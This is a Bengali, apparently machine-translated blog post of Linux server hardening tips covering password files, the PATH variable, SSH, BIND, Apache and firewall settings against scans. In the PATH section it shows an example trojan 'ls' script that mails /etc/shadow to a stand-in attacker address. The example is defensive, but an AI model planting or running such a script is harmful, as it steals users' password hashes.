আপনার লিনাক্স (সার্ভার) এর সুরক্ষা টিপস (পর্ব 1)

@Jlcmux

5 মিনিট

আমি দীর্ঘদিন ধরে ব্লগে কিছু প্রকাশ করি নি এবং একটি বই থেকে নেওয়া কিছু পরামর্শ আমি আপনার সাথে ভাগ করে নিতে চাই যা (অন্যদের মধ্যে)। আমি এটি বিশ্ববিদ্যালয়ে পেয়েছি এবং আমি সবেমাত্র পড়েছি এবং যদিও এটি সত্যিই কিছুটা পুরানো এবং দেখানো কৌশলগুলি সিস্টেমের বিবর্তনকে কেন্দ্র করে কাজ করার সম্ভাবনা খুব কম, তবে এগুলি আকর্ষণীয় দিকও যা প্রদর্শিত হতে পারে। 9788448140502

আমি স্পষ্ট করতে চাই যে এগুলি একটি লিনাক্স সিস্টেমের দিকে লক্ষ্য রাখে যা একটি সার্ভার হিসাবে ব্যবহৃত হয়, একটি মাঝারি বা সম্ভবত বৃহত্তর স্কেল, ডেস্কটপ ব্যবহারকারী স্তরে প্রয়োগ করা হলেও, এটি খুব কার্যকর হবে না।

আমি এও সতর্ক করে দিয়েছি যে এগুলি সহজ দ্রুত টিপস এবং আমি খুব বেশি বিশদে যাব না, যদিও আমি নির্দিষ্ট বিষয়ে আরও একটি নির্দিষ্ট এবং বিস্তৃত পোস্ট করার পরিকল্পনা করছি। তবে আমি পরে এটি দেখতে পাবেন। চল শুরু করি.

পাসওয়ার্ড নীতি। 

যদিও এটি ক্যাচফ্রেজের মতো শোনাচ্ছে, একটি ভাল পাসওয়ার্ড নীতি থাকার ফলে একটি দুর্বল সিস্টেমের মধ্যে পার্থক্য আসে। "ব্রুট ফোর্স" এর মতো আক্রমণগুলি কোনও সিস্টেমে অ্যাক্সেস করার জন্য একটি খারাপ পাসওয়ার্ড থাকার সুযোগ নেয়। সর্বাধিক সাধারণ টিপস হ'ল:

  • বড় হাতের এবং ছোট হাতের সংমিশ্রণ।
  • বিশেষ অক্ষর ব্যবহার করুন।
  • সংখ্যা।
  • 6 টিরও বেশি সংখ্যক (আশাকরি 8 এর বেশি)

এগুলি ছাড়াও, দুটি প্রয়োজনীয় ফাইল বিবেচনা করা যাক।  / ইত্যাদি / পাসডাব্লু এবং / ইত্যাদি / ছায়া।

খুব গুরুত্বপূর্ণ কিছু ফাইল ফাইল / ইত্যাদি / পাসডাব্লু আমাদের ব্যবহারকারীর নাম দেওয়ার পাশাপাশি তার ইউআইডি, ফোল্ডার পাথ, বাশ .. ইত্যাদি কিছু ক্ষেত্রে এটি ব্যবহারকারীর এনক্রিপ্ট করা কীটিও দেখায়।

 আসুন এর সাধারণ রচনাটি দেখুন।

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

ব্যবহারকারী: ক্রিপ্টকি: ইউডি: গিড: পথ :: পথ: বাশ

এখানে আসল সমস্যাটি হ'ল এই নির্দিষ্ট ফাইলটির অনুমতি রয়েছে -আরড-আর - আর যার অর্থ এটি সিস্টেমে যে কোনও ব্যবহারকারীর জন্য পড়ার অনুমতি রয়েছে। এবং এনক্রিপ্ট করা কী থাকা প্রকৃতটি বোঝা খুব কঠিন নয়।

এই কারণেই ফাইলটি বিদ্যমান / ইত্যাদি / ছায়া এটি সেই ফাইলটি যেখানে অন্যান্য ব্যবহারকারীর কীগুলি সংরক্ষণ করা হয় stored এই ফাইলটির প্রয়োজনীয় অনুমতি রয়েছে যাতে কোনও ব্যবহারকারী এটি পড়তে না পারে।

এটি ঠিক করার জন্য, আমাদের অবশ্যই ফাইলে যেতে হবে / Etc / passwd এবং এনক্রিপ্ট করা কীটিকে "x" এ পরিবর্তন করুন, এটি কীটি কেবল আমাদের ফাইলে সংরক্ষণ করতে পারে / ইত্যাদি / ছায়া

desdelinux:x:500:501::/home/usuario1:/bin/bash

PATH এবং .bashrc এবং অন্যদের সাথে সমস্যা।

যখন ব্যবহারকারী তাদের কনসোলে একটি কমান্ড চালায়, শেলটি PATH এনভায়রনমেন্ট ভেরিয়েবলের মধ্যে থাকা ডিরেক্টরিগুলির তালিকায় সেই কমান্ডটি সন্ধান করে।

আপনি যদি কনসোলে "প্রতিধ্বনি $ PATH" টাইপ করেন তবে এটি এমন কিছু আউটপুট দেয়।

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

এই ফোল্ডারগুলির প্রত্যেকটি যেখানে শেল এটি সম্পাদন করার জন্য লিখিত আদেশটি সন্ধান করবে। দ্য "." এর অর্থ হ'ল প্রথম ফোল্ডারটি একই ফোল্ডারের যেখানে কমান্ডটি কার্যকর করা হয়।

ধরুন এখানে কোনও ব্যবহারকারী "কার্লোস" আছে এবং এই ব্যবহারকারী "খারাপ করতে" চান evil এই ব্যবহারকারী তার মূল ফোল্ডারে "ls" নামক একটি ফাইল রেখে যেতে পারে এবং এই ফাইলটিতে এই জাতীয় কমান্ড কার্যকর করতে পারে:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

এবং যদি গন্তব্যের জিনিসগুলির জন্য মূল ব্যবহারকারী, কার্লোস ফোল্ডারের ভিতরে ফোল্ডারগুলি তালিকাভুক্ত করার চেষ্টা করে (এটি একই ফোল্ডারে প্রথমে কমান্ডটি সন্ধান করে, অসাবধানতায় এটি ইমেলটিতে পাসওয়ার্ড সহ ফাইলটি প্রেরণ করবে এবং তারপরে ফোল্ডারগুলি তালিকাভুক্ত করা হবে এবং তিনি খুব দেরি পর্যন্ত খুঁজে পাবেন না।

এটি এড়াতে আমাদের অবশ্যই "নির্মূল করতে হবে"। PATH ভেরিয়েবলের।

একইভাবে, /.bashrc, /.bashrc_profile, ./.Lgin হিসাবে ফাইলগুলি নিরীক্ষণ করে পরীক্ষা করা উচিত যে "নেই"। " PATH ভেরিয়েবলে এবং প্রকৃতপক্ষে এই জাতীয় ফাইলগুলি থেকে আপনি একটি নির্দিষ্ট কমান্ডের গন্তব্য পরিবর্তন করতে পারেন।

পরিষেবাগুলির সাথে টিপস:

এসএইচএইচ

  • Sshd_config ফাইলে ssh প্রোটোকলের সংস্করণ 1 অক্ষম করুন।
  • মূল ব্যবহারকারীকে ssh দ্বারা লগ ইন করার অনুমতি দেবেন না।
  • ফাইল এবং ফোল্ডারগুলি ssh_host_key, ssh_host_dsa_key এবং ssh_host_rsa_key কেবলমাত্র ব্যবহারকারীদের দ্বারা পড়তে হবে।

বাঁধাই করা

  • নাম দেওয়া কোডফ ফাইলটিতে স্বাগত বার্তাটি পরিবর্তন করুন যাতে এটি সংস্করণ নম্বরটি না দেখায়
  • জোন স্থানান্তর সীমাবদ্ধ করুন এবং কেবল এটির জন্য প্রয়োজনীয় দলগুলির জন্য এটি সক্ষম করুন।

এ্যাপাচি

  • স্বাগত বার্তায় আপনার সংস্করণটি প্রদর্শন করা থেকে পরিষেবাটি আটকাবেন। Httpd.conf ফাইল সম্পাদনা করুন এবং লাইনগুলি যুক্ত বা সংশোধন করুন:  

ServerSignature Off
ServerTokens Prod

  • স্বয়ংক্রিয় সূচী অক্ষম করুন
  • .Htacces, * .inc, * .jsp .. ইত্যাদি সংবেদনশীল ফাইল পরিবেশন না করার জন্য অ্যাপাচি কনফিগার করুন
  • পরিষেবা থেকে ম্যান পৃষ্ঠা বা নমুনা সরান Remove
  • একটি আবদ্ধ পরিবেশে অ্যাপাচি চালান

নেটওয়ার্ক সুরক্ষা।

বাহ্যিক নেটওয়ার্ক থেকে আপনার সিস্টেমে সমস্ত সম্ভাব্য প্রবেশদ্বার coverেকে রাখা অপরিহার্য, আপনার নেটওয়ার্ক থেকে প্রবেশকারীদের স্ক্যান করা এবং তথ্য নেওয়া থেকে রোধ করার জন্য এখানে কয়েকটি প্রয়োজনীয় টিপস রইল।

আইসিএমপি ট্র্যাফিক অবরোধ করুন

ফায়ারওয়ালটি অবশ্যই সমস্ত ধরণের আগমনকারী এবং বহির্গামী আইসিএমপি ট্র্যাফিক এবং প্রতিধ্বনির প্রতিক্রিয়াগুলি ব্লক করতে কনফিগার করা উচিত। এটির সাহায্যে আপনি এড়াতে পারেন, উদাহরণস্বরূপ, এমন একটি স্ক্যানার যা আপনাকে বিভিন্ন আইপিতে লাইভ সরঞ্জামগুলির সন্ধান করে। 

টিসিপি পিং স্ক্যান এড়িয়ে চলুন।

আপনার সিস্টেমটি স্ক্যান করার একটি উপায় টিসিপি পিং স্ক্যান। মনে করুন যে আপনার সার্ভারে 80 পোর্টে একটি অ্যাপাচি সার্ভার রয়েছে The প্রবেশদ্বারকারী সেই বন্দরে একটি এসকে অনুরোধ পাঠাতে পারে, এটির সাথে, যদি সিস্টেমটি প্রতিক্রিয়া জানায়, কম্পিউটারটি জীবিত থাকবে এবং বাকী সমস্ত বন্দরগুলি স্ক্যান করবে।

এর জন্য, আপনার ফায়ারওয়ালটিতে সর্বদা "রাষ্ট্র সচেতনতা" বিকল্প থাকা উচিত এবং ইতিমধ্যে প্রতিষ্ঠিত টিসিপি সংযোগ বা সেশনের সাথে মিলে না এমন সমস্ত এসিকে প্যাকেটগুলি বাতিল করা উচিত।

কিছু অতিরিক্ত টিপস:

  • আপনার নেটওয়ার্কে পোর্ট স্ক্যান সনাক্ত করতে আইডিএস সিস্টেমগুলি ব্যবহার করুন।
  • ফায়ারওয়ালটি কনফিগার করুন যাতে এটি সংযোগ উত্স পোর্ট সেটিংসে বিশ্বাস না করে।

এর কারণ হল কিছু স্ক্যানগুলি "জাল" উত্স পোর্ট যেমন 20 বা 53 ব্যবহার করে, যেহেতু অনেকগুলি সিস্টেম এই পোর্টগুলিতে বিশ্বাস করে কারণ এগুলি একটি এফটিপি বা ডিএনএসের বৈশিষ্ট্যযুক্ত।

উল্লেখ্য: মনে রাখবেন যে এই পোস্টে নির্দেশিত বেশিরভাগ সমস্যা ইতিমধ্যে প্রায় সমস্ত বর্তমান বিতরণে সমাধান হয়ে গেছে। তবে কখনই এই সমস্যাগুলি সম্পর্কে মূল তথ্য থাকতে ব্যাথা করে না যাতে এটি আপনার না ঘটে।

উল্লেখ্য: পরে আমি একটি নির্দিষ্ট বিষয় দেখব এবং আমি আরও বিস্তারিত এবং বর্তমান তথ্য সহ একটি পোস্ট করব।

সবাইকে পড়ার জন্য ধন্যবাদ জানায়।

গ্রিটিংস।


আপনার মন্তব্য দিন

আপনার ইমেল ঠিকানা প্রকাশিত হবে না। প্রয়োজনীয় ক্ষেত্রগুলি দিয়ে চিহ্নিত করা *

*

*

  1. ডেটার জন্য দায়বদ্ধ: মিগুয়েল অ্যাঞ্জেল গাটান
  2. ডেটার উদ্দেশ্য: নিয়ন্ত্রণ স্প্যাম, মন্তব্য পরিচালনা।
  3. আইনীকরণ: আপনার সম্মতি
  4. তথ্য যোগাযোগ: ডেটা আইনি বাধ্যবাধকতা ব্যতীত তৃতীয় পক্ষের কাছে জানানো হবে না।
  5. ডেটা স্টোরেজ: ওসেন্টাস নেটওয়ার্কস (ইইউ) দ্বারা হোস্ট করা ডেটাবেস
  6. অধিকার: যে কোনও সময় আপনি আপনার তথ্য সীমাবদ্ধ করতে, পুনরুদ্ধার করতে এবং মুছতে পারেন।

  1.   তথ্যবহুল তিনি বলেন
    পূর্বে 8 বছর

    আমি নিবন্ধটি সত্যিই পছন্দ করেছি এবং আমি বিষয়টিতে আগ্রহী, আমি আপনাকে সামগ্রী আপলোড চালিয়ে যেতে উত্সাহিত করি।

    ইনফরমিটিকোকে উত্তর দিন